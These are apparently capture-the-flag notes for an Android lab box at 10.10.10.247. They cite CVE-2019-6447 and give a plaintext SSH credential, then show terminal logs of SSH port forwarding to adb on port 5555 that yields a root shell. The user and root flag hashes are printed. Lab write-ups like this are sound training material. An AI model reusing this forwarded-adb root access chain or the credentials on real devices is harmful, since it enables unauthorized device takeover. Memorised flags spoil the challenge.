Explore
- ssh port forwarding
- adb shell connect
CVE-2019-6447 getfile jpg:
kristi:Kr1sT!5h@Rp3xPl0r3!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
| ──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln] └─$ ssh kristi@10.10.10.247 -p2222 -L 5555:localhost:5555 Password authentication Password: :/ $ ls acct init.superuser.rc sbin bin init.usb.configfs.rc sdcard bugreports init.usb.rc sepolicy cache init.zygote32.rc storage charger init.zygote64_32.rc sys config lib system d mnt ueventd.android_x86_64.rc data odm ueventd.rc default.prop oem vendor dev plat_file_contexts vendor_file_contexts etc plat_hwservice_contexts vendor_hwservice_contexts fstab.android_x86_64 plat_property_contexts vendor_property_contexts init plat_seapp_contexts vendor_seapp_contexts init.android_x86_64.rc plat_service_contexts vendor_service_contexts init.environ.rc proc vndservice_contexts init.rc product :/ $ cd sdcard :/sdcard $ ls Alarms DCIM Movies Notifications Podcasts backups user.txt Android Download Music Pictures Ringtones dianxinos :/sdcard $ cat user.txt f32017174c7c7e8f50c6da52891ae250 :/sdcard $
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126
| ──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln] └─$ adb device Command 'adb' not found, but can be installed with: sudo apt install adb ┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln] └─$ sudo apt install adb 127 ⨯ [sudo] password for kali: Reading package lists... Done Building dependency tree... Done Reading state information... Done The following packages were automatically installed and are no longer required: golang-1.17-go golang-1.17-src golang-src pkg-config Use 'sudo apt autoremove' to remove them. The following additional packages will be installed: android-libadb android-libbase android-libboringssl android-libcrypto-utils android-libcutils android-liblog android-sdk-platform-tools-common The following NEW packages will be installed: adb android-libadb android-libbase android-libboringssl android-libcrypto-utils android-libcutils android-liblog android-sdk-platform-tools-common 0 upgraded, 8 newly installed, 0 to remove and 1142 not upgraded. Need to get 1,021 kB of archives. After this operation, 3,057 kB of additional disk space will be used. Do you want to continue? [Y/n] y Get:1 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-liblog amd64 1:10.0.0+r36-7 [44.4 kB] Get:2 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libbase amd64 1:10.0.0+r36-7 [41.5 kB] Get:3 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libboringssl amd64 10.0.0+r36-1 [612 kB] Get:4 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libcrypto-utils amd64 1:10.0.0+r36-7 [12.3 kB] Get:5 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libcutils amd64 1:10.0.0+r36-7 [33.3 kB] Get:6 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libadb amd64 1:10.0.0+r36-7 [165 kB] Get:7 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-sdk-platform-tools-common all 28.0.2+3 [8,020 B] Get:8 https://mirrors.aliyun.com/kali kali-rolling/main amd64 adb amd64 1:10.0.0+r36-7 [104 kB] Fetched 1,021 kB in 11s (89.7 kB/s) Selecting previously unselected package android-liblog. (Reading database ... 279936 files and directories currently installed.) Preparing to unpack .../0-android-liblog_1%3a10.0.0+r36-7_amd64.deb ... Unpacking android-liblog (1:10.0.0+r36-7) ... Selecting previously unselected package android-libbase. Preparing to unpack .../1-android-libbase_1%3a10.0.0+r36-7_amd64.deb ... Unpacking android-libbase (1:10.0.0+r36-7) ... Selecting previously unselected package android-libboringssl. Preparing to unpack .../2-android-libboringssl_10.0.0+r36-1_amd64.deb ... Unpacking android-libboringssl (10.0.0+r36-1) ... Selecting previously unselected package android-libcrypto-utils. Preparing to unpack .../3-android-libcrypto-utils_1%3a10.0.0+r36-7_amd64.deb ... Unpacking android-libcrypto-utils (1:10.0.0+r36-7) ... Selecting previously unselected package android-libcutils. Preparing to unpack .../4-android-libcutils_1%3a10.0.0+r36-7_amd64.deb ... Unpacking android-libcutils (1:10.0.0+r36-7) ... Selecting previously unselected package android-libadb. Preparing to unpack .../5-android-libadb_1%3a10.0.0+r36-7_amd64.deb ... Unpacking android-libadb (1:10.0.0+r36-7) ... Selecting previously unselected package android-sdk-platform-tools-common. Preparing to unpack .../6-android-sdk-platform-tools-common_28.0.2+3_all.deb ... Unpacking android-sdk-platform-tools-common (28.0.2+3) ... Selecting previously unselected package adb. Preparing to unpack .../7-adb_1%3a10.0.0+r36-7_amd64.deb ... Unpacking adb (1:10.0.0+r36-7) ... Setting up android-sdk-platform-tools-common (28.0.2+3) ... Setting up android-liblog (1:10.0.0+r36-7) ... Setting up android-libboringssl (10.0.0+r36-1) ... Setting up android-libcrypto-utils (1:10.0.0+r36-7) ... Setting up android-libbase (1:10.0.0+r36-7) ... Setting up android-libcutils (1:10.0.0+r36-7) ... Setting up android-libadb (1:10.0.0+r36-7) ... Setting up adb (1:10.0.0+r36-7) ... Processing triggers for libc-bin (2.32-4) ... Processing triggers for man-db (2.9.3-2) ... Processing triggers for kali-menu (2021.1.4) ... ┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln] └─$ adb device adb: unknown command device ┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln] └─$ adb devices 1 ⨯ * daemon not running; starting now at tcp:5037 * daemon started successfully List of devices attached emulator-5554 device
┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln] └─$ adb connect 127.0.0.1:5555 connected to 127.0.0.1:5555 ┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln] └─$ adb -s localhost shell error: device 'localhost' not found ┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln] └─$ adb devices 1 ⨯ List of devices attached 127.0.0.1:5555 device emulator-5554 device
┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln] └─$ adb -s 127.0.0.1 shell x86_64:/ root x86_64:/ acct init oem sys bin init.android_x86_64.rc plat_file_contexts system bugreports init.environ.rc plat_hwservice_contexts ueventd.android_x86_64.rc cache init.rc plat_property_contexts ueventd.rc charger init.superuser.rc plat_seapp_contexts vendor config init.usb.configfs.rc plat_service_contexts vendor_file_contexts d init.usb.rc proc vendor_hwservice_contexts data init.zygote32.rc product vendor_property_contexts default.prop init.zygote64_32.rc sbin vendor_seapp_contexts dev lib sdcard vendor_service_contexts etc mnt sepolicy vndservice_contexts fstab.android_x86_64 odm storage x86_64:/ x86_64:/data /system/bin/sh: ld: not found 127|x86_64:/data adb app-lib dalvik-cache lost+found misc_de resource-cache system_ce vendor anr app-private data media nfc root.txt system_de vendor_ce app backup drm mediadrm ota ss tombstones vendor_de app-asec bootchart es_starter.sh misc ota_package ssh_starter.sh user app-ephemeral cache local misc_ce property system user_de x86_64:/data f04fc82b6d49b41c9b08982be59338c5 x86_64:/data
|